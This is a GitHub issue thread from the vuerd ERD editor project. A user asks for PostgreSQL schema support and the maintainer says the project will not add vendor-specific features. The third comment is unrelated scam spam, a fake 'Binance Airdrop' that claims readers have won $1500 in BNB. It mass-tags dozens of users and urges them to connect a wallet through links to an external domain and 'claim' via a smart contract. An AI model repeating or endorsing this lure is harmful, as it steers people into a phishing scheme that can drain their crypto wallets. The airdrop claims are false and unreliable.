### ISSUE TITLE
Support postgresql schemas

### ISSUE THREAD

**Issue by Neyri** [vuerd/vuerd#310]
Hello,
Thanks for the great tool 😄 

I'm currently working with a postgresql database and I would like to make use of postgresql schema feature. 
I think it would be nice to add another attribute to postgresql tables called schema (defaulting to public) and add a color differentiation between tables in the same schema

**Comment by dineug** [comment]
Do you mean that function?
https://docs.erd-editor.io/docs/guide/guides/table-related-functions#table-memo-color-specification

**Comment by Neyri** [comment]
Not really. In postgresql there's a layer between databases and tables called schemas (see [here](https://www.postgresql.org/docs/current/ddl-schemas.html)). For instance, you can have a database db with 2 different schemas and several tables in each schema (unique table names are defined per schema and not per database). So my suggestion would be the ability to select a schema associated with a table

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @39998, @RamonJardim, @flouthoc, @savant-lab, @rendaardy, @harry830622, @iamOgunyinka, @LuSicong22, @alexkyen, @ahmedhany82, @serhiienko, @salihkilicli, @rhacker, @Jleumas, @KevinN21, @MSM74588, @missjoebob, @gionn, @cuihunp66, @dixie4u213, @life2k8, @baranonen, @NyleCohen, @thekevinmoses, @simoneromano96, @danielm, @symonkipkemei, @githubsands, @Ragnarok271, @Rika321, @Autumin, @chhk-dev, @Sourceless, @ck123890, @masknugget, @traviscaro, @Uviwe-oss, @enzoftware, @Vrndavana, @JoachimFrydenlund, @just-carlod, @KVGXM3, @PointyFluff, @fedefloris, @marcinmilewski1, @CuPidev, @Nini666710, @qjawe, @TJT001, @bbpp222006

**Comment by dineug** [comment]
Currently, we are developing the functionality assuming one schema per file as a default, and changing that principle would be a challenging decision. We are not considering vendor-specific features at the moment.
